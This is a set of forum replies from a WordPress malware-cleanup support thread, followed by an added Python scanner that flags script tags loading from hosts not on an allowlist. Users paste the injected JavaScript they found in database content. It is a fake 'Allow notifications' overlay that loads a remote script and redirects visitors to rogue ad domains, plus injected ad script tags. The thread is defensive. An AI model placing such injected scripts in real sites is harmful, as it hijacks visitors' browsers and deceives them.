Forum Replies Created
just a quick thank you… the latest version deletes the variation of malware… can’t recommend your plugin enough! many many thanks.
it’s in posts files (not necessarily pages but other posts) /wp-admin/post.php?post=1615&action=edit
happy to give access to phpmyadmin and wp-admin
hiya, great tool as always!!! many many thanks Eli.
found that a new variation of this injected code is not being picked up.
tried a mysql query and it’s not picking up a char immediately after ““Allow—. char looks like a sq with 009D when pasted into a sql query however it renders as a red bullet
database charset is utf8mb4_unicode_ci
have wrapped the char in a code tag, see html view of this msg.
;
const overlay = {“delay”:3000,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow†to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement(‘script’);
s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
just to let you know, and thank you for info and update, chkd for latest download defn, JAQLO, and it hasn’t picked up the script in posts.
(However, i’m able to remove the script via a SQL query)
awesome plugin!
new db injection spotted that isn’t being picked up
<script async src=’//madsans.com/6f2d37b24c56899a75c10e01143c7901/invoke.js’></script>
Your plugin is probably now my favourite… and unfortunately it’s getting used quite a lot, as the redirect script is still getting into one of my sites running theGem theme.
site doesn’t have related posts plugin, and I have checked functions.php
Is my next task to reload fresh plugins and a fresh wp? any tips gratefully received.
I have other security plugins running, maybe that’s counter-productive?
Can you drop me a line about your hosting service?
(sorry bombarding you with multiple questions)
@ELI
Many thanks, even tho i cleaned the database, double checked pages and other content myself, your plugin still found and Fixed 34 occasions that were not picked up by other methods…
A big thank you.!!!
… malware also found in image descriptions, and custom footer, and page/post revisions… sigh (it’s not as if there was no protection on the site)
ok so ran a find on all wp files, ie checked all php and js files, then checked keywords in wp database using myphp, and found that all the malware scripts have been added to the page content. This was true for another site i cleaned last week.
here is the embedded script below for your info… oh and i had to deactivate bakery plugin, and use classic mode to edit page in raw/html (for reference sites were running php 7.0 or 1 or 2, they are now all on 7.3, all themes and plugins and wp versions were set to auto update, themes have been popular ones such as avada, betheme, enfold, theGem):
<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow†to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow†to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
hope this helps
any tips for prevention gladly received
i have similar issue: pages are redirecting, scan is not picking this up but
malware identified as rogueads.afu?3 by Sucuri
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
have not as yet completely cleaned the site, i provide services to charity and community orgs in my spare time and they’ve pretty much all been hit with same malware
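Added example, not part of the original posts or the plugin: the posts above report the same injected loader in posts, revisions and image descriptions, and a text match that fails on the U+009D character after “Allow. This sketch flags rows by the hosts their script tags load or redirect to rather than by the overlay text, over rows exported from wp_posts; the allowlist, the sample rows and the `.example` hosts are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only external host this site intentionally loads scripts from.
ALLOWED_HOSTS = {"cdn.example.org"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_ATTR_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# Quoted absolute or protocol-relative URLs inside an inline script body,
# e.g. s.src='//host/x.js' or window.location.replace("//host/y.php").
INLINE_URL_RE = re.compile(r"""["']((?:https?:)?//[^"'\s]+)["']""", re.I)

def host_of(url):
    """Host of an absolute or protocol-relative URL; '' for same-site paths."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlsplit(url).hostname or "").lower()

def foreign_script_hosts(content):
    """Hosts referenced by script tags in content that are not allowlisted."""
    hosts = set()
    for attrs, body in SCRIPT_RE.findall(content):
        for url in SRC_ATTR_RE.findall(attrs) + INLINE_URL_RE.findall(body):
            host = host_of(url)
            if host and host not in ALLOWED_HOSTS:
                hosts.add(host)
    return hosts

def scan(rows):
    """rows: (ID, post_type, post_content) tuples exported from wp_posts."""
    hits = {}
    for post_id, post_type, content in rows:
        hosts = foreign_script_hosts(content)
        if hosts:
            hits[(post_id, post_type)] = sorted(hosts)
    return hits

# Constructed sample data; the overlay text carries the mojibake quote + U+009D.
LOADER = ('<script>const overlay = {"description":"Click \u201cAllow\u00e2\u20ac\u009d to subscribe"};'
          "const s = document.createElement('script'); s.src='//push-loader.example/tag.min.js?z=1';"
          's.onload = (sdk) => {sdk.onPermissionDenied(() => '
          '{window.location.replace("//redirect.example/afu.php?zoneid=1")});};'
          "document.head.appendChild(s);</script>")
SAMPLE_ROWS = [
    (101, "post", "<p>Hello</p>" + LOADER),
    (102, "revision", "<p>Old</p><script async src='//ads.example/abc/invoke.js'></script>"),
    (103, "attachment", 'Photo <script data-cfasync="false" src="//banners.example/adServe?tid=1"></script>'),
    (104, "page", '<script src="/wp-includes/js/x.js"></script><script src="https://cdn.example.org/a.js"></script>'),
]
```

Because the match never touches the description string, the result is the same whether or not the stray U+009D survives a copy, paste or charset conversion.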